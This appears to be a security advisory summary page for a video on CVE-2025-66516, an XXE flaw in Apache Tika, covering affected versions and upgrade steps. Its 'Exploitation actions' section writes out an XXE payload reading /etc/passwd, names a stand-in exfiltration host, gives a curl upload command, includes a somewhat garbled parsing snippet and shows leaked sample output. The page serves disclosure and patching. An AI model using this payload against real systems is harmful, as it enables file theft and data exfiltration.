Apache Tika: XML External Entity (XXE) injection in Apache Tika (CVE-2025-66516) #shorts
Summary
Welcome to Security Spotlight. Today’s episode covers CVE-2025-66516, a critical XXE vulnerability in Apache Tika with a perfect 10.0 CVSS score. Attackers can exploit crafted XFA files inside PDFs to trigger XML External Entity injection, potentially exposing sensitive data or executing arbitrary requests.
Product details
This vulnerability affects three Apache Tika components: tika-core versions up to 3.2.1, tika-pdf-module versions up to 3.2.1, and tika-parsers 1.x releases below 2.0.0. Apache Tika is a content analysis toolkit used to extract text and metadata from diverse file formats in Java applications.
Vulnerability type summary
CVE-2025-66516 is an XML External Entity (XXE) injection flaw, classified under CWE-611. XXE occurs when an XML parser processes untrusted input containing external entity references, enabling attackers to read local files, perform server-side request forgery, or launch denial-of-service attacks.
Details of the vulnerability
Researchers discovered that crafted XFA streams embedded in PDF documents bypass tika-core’s default protections, allowing external entity resolution. Although the initial entry point was the tika-pdf-module (CVE-2025-54988), the root cause and fix reside in tika-core. Users who updated only the parser module but not tika-core remained vulnerable. Additionally, in 1.x releases, PDFParser lives in tika-parsers, expanding the affected scope.
Conclusion
To mitigate CVE-2025-66516, upgrade all Apache Tika components: tika-core and tika-pdf-module to version 3.2.2 or later, and tika-parsers to 1.28.6 or newer. Review your code for custom XML parser configurations and disable external entity processing. Stay alert for upstream patches and apply them promptly to defend against XXE exploits.
Watch the full video on YouTube: CVE-2025-66516
Remediation and exploitation details
This chain involves the following actors
- Attacker: External adversary who crafts malicious PDF payloads
- System Administrator: Maintains and updates Apache Tika deployments
This following systems are involved
- Apache Tika Core (Central parsing engine for XML and other document formats): Performs XML processing and resolves entities
- Apache Tika PDF Module (Parses PDF documents, including XFA forms): Entry point where the malicious XFA payload is handed off
- Apache Tika Parsers (Collection of language‐specific and format‐specific parsers): In 1.x releases, hosts the PDFParser that processes XFA
Attack entry point
- Crafted XFA payload in PDF: A PDF file embedding an XFA form that defines an external XML entity pointing to sensitive data or a remote endpoint
Remediation actions
Exploitation actions
Define an external entity referencing file:///etc/passwd or http://evil.example.com/collect
- <!DOCTYPE xfa [<!ENTITY exfil SYSTEM "file:///etc/passwd">]>
Upload or email the PDF to trigger automatic parsing
- curl -F "file=@malicious.pdf" https://example.com/parse
XXE injection via unresolved configuration
- TikaInputStream tika = TikaInputStream.get(pdfStream); tika.parse(tika);
Entity resolution leads to inclusion of sensitive content
- Parsed output contains contents of /etc/passwd or attacker host response
Data exfiltration via returned API response or log aggregation
- Response body: "root:x:0:0:root:/root:/bin/bash…"
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
- https://cve.org/CVERecord?id=CVE-2025-54988
- [2025-12-05] A critical XXE vulnerability in Apache Tika requires an urgent patch.
- [2025-12-06] A maximum severity XXE vulnerability (CVE-2025-66516) discovered in Apache Tika allows XML external entity attacks.
- [2025-12-09] Apache Tika vulnerability CVE-2025-66516 allows XXE attacks, affecting multiple modules.
- [2025-12-09] Critical XXE vulnerability identified in Apache Tika, designated as CVE-2025-66516, with a CVSS score of 10.0.